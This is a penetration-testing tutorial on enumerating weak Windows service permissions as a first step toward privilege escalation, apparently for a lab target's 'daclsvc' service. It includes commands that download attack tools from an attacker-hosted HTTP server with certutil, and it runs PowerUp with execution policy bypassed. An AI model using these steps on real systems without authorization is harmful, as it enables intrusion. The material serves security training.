Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

ENUMERATING SERVICES MANUALY

1. we can use the wmic command to display all the non-standard services running on the system using the following command:
   wmic service get name,displayname,pathname,startmode |findstr /i /v "C:\Windows\\"

   

2. To perform the same function as the wmic command in PowerShell, apply the Get-WmiObject cmdlet as demonstrated:
   Get-WmiObject -class Win32_Service -Property Name,DisplayName,PathName,StartMode | Where {$_.PathName -notlike "C:\Windows\*"} | Select PathName,DisplayName,Name

   

ENUMERATING SERVICES WITH ACCESSCHK

1. If you don't have the Sysinternals Suite on your machine, you can download it from the official Microsoft Website.

   

   NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
   systeminfo | findstr /B /C:"System Type"

2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
   certutil -urlcache -f http://[IP-ADRESS]:8000/accesschk64.exe accesschk64.exe

   

3. We can use accesschk64.exe to find any service that is writeable for our current user / any user:
   .\accesschk64.exe "%USERNAME%" -wuvc * -accepteula

   

   NOTE: Here, we can see that the daclsvc service has SERVICE_CHANGE_CONFIG permissions, allowing any user to modify the service,The only other permission that allows us to modify a service is SERVICE_ALL_ACCESS.

4. We can use PowerUp to perform all of the misconfiguration / vulnerability checks at once.
   powershell -NoProfile -ExecutionPolicy Bypass -Command "& {.\PowerUp.ps1; Invoke-AllChecks}"

   

ENUMERATING SERVICES PERMISSION WITH WINPEAS

1. Since the target runs a 64-bit OS, we can send 64-bit winPEAS via a Python HTTP server..
   python3 -m http.server 8000

   

   NOTE: We have identified that the target machine is a 64-bit architecture using the following command:
   systeminfo | findstr /B /C:"System Type"

2. Transfer winPEAS to target machine Using certutil
   certutil -urlcache -f http://[IP-ADRESS]:8000/winPEASx64.exe winPEASx64.exe

   

3. Now, all we need to do is run winPEAS to search for For weak service permissions 
   .\winPEASx64.exe

   

   NOTE: The Services Information section in winPEAS provides a comprehensive list of all services, along with their configurations and potential security issues.

4. Additionally, if we missed this somehow, scrolling down a bit further we will also see this finding in the Modifiable Services sub-section.

   

GATHERING SERVICE INFORMATION

1. The pieces of information about the service that we are most interested in are the start mode and the binary path,StartName
   sc qc daclsvc

   

2. using powershell
   Get-WmiObject win32_service | ?{$_.Name -like 'daclsvc'} | select Name, DisplayName, StartMode, State, PathName, StartName

   

   NOTE: We can see the StartName shows LocalSystem, which means this service executes as SYSTEM. If it was showing a different StartName, we would need to modify that field too to make sure the service executes as SYSTEM.

3. we can use SetACL to enumerate the permissions on the daclsvc service we found using the following command:
   .\SetACL.exe -on "daclsvc" -ot srv -actn list